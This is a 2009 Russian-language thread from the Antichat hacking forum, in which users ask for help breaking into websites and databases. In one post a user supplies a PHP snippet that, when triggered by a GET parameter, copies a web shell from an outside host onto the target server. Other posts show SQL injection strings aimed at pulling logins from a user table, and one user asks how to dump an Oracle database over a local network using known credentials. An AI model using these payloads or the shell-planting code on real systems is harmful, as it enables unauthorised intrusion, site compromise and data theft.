HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 03.03.2009, 20:21
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


По умолчанию

Цитата:
Нужен скриптик на пхп
Чтобы когда зашол на страницу то заметно заливался шелл на сайт
путь до сайта знаю
Ты толком можешь объяснить? Через что заливать? Инъекция? Файл_прив включен? Толку с того, что путь знаешь...
 
Ответить с цитированием

  #2  
Старый 03.03.2009, 20:41
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


По умолчанию

Assembler, тебе сюда! http://forum.antichat.ru/forum76.html
 
Ответить с цитированием

  #3  
Старый 03.03.2009, 20:43
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008

Репутация: 58
По умолчанию

еще один вопрос)
конструкция select+1+top+login+from+user+where+id=1 не выводит ошибки)
как я понимаю просто такого ид не существует?
select+top+1+start+at+2+login+from+user ругается на
Цитата:
Incorrect syntax near '2'.
где то был топик на эту тему но ответа так и не увидел.
какие еще есть варианты вывести другие записи?)
 
Ответить с цитированием

  #4  
Старый 03.03.2009, 20:47
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

mailbrush я сказал это чтобы малоли путь понадобиться при залитии файла (файл прив вроде включен)

Цитата:
Нужен скриптик на пхп
Чтобы когда зашол на эту пхп страницу(скрипт) то заметно заливался шелл на сайт
путь до сайта знаю(если понадобиться)
up. чуть подкоректировал чтобы было легче понимать
 
Ответить с цитированием

  #5  
Старый 03.03.2009, 20:53
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


По умолчанию

Цитата:
Сообщение от diznt  
mailbrush я сказал это чтобы малоли путь понадобиться при залитии файла (файл прив вроде включен)



up. чуть подкоректировал чтобы было легче понимать
Насколько я понял тебя:
if($_GET['get_shell']=='yes')
copy('http://malicos.ru/shell.txt','/путь/имя_шелла');
/*
file_put_contents( '/путь/имя_шелла',file_get_contents('http://malicos.ru/shell.txt'));
и т.п. и т.п.

*/
 
Ответить с цитированием

  #6  
Старый 03.03.2009, 20:52
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


По умолчанию

Ух блин... Это скуля? Какие колонки выводятся?
 
Ответить с цитированием

  #7  
Старый 03.03.2009, 21:32
mozarat
Новичок
Регистрация: 10.02.2009
Сообщений: 7
Провел на форуме:
26091

Репутация: 3
По умолчанию

Вопрос может не совсем в тему...
Какой сниффер лучше юзать для просмотра пакетов отправляемых браузером на сайты?
 
Ответить с цитированием

  #8  
Старый 03.03.2009, 23:16
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от mozarat  
Вопрос может не совсем в тему...
Какой сниффер лучше юзать для просмотра пакетов отправляемых браузером на сайты?
Плагин к фалерфоксу, - LiveHTTP Headers
 
Ответить с цитированием

  #9  
Старый 04.03.2009, 12:20
user777
Новичок
Регистрация: 25.02.2009
Сообщений: 4
Провел на форуме:
10495

Репутация: 0
По умолчанию

Перекопал много ресурсов но так никто и не ответил.
Как можно "слить" базу данных из локальной сети? Сервер базы крутится на Оракле.
Имеется связка логин\пасс для программ работающих с базой.
Как? Чем? Что еще нужно?
 
Ответить с цитированием

  #10  
Старый 04.03.2009, 17:34
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463

Репутация: 97
По умолчанию

Есть скуль, на любой запрос реагирует

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

Пробывал и /**/ и разнообразные альтернативные варианты,окончание sql запроса так же пробывал разнообразные, всё равно такой же результат.
Подзапросы так же не работают.
Например id=211+or+substring(version(),1,1)=5-- плюётся ашыбкой

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'or substring(version(),1,1)=5--' at line 1

Не могу даже подобрать кол-во полей.
В чём может быть проблема и как обойти?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.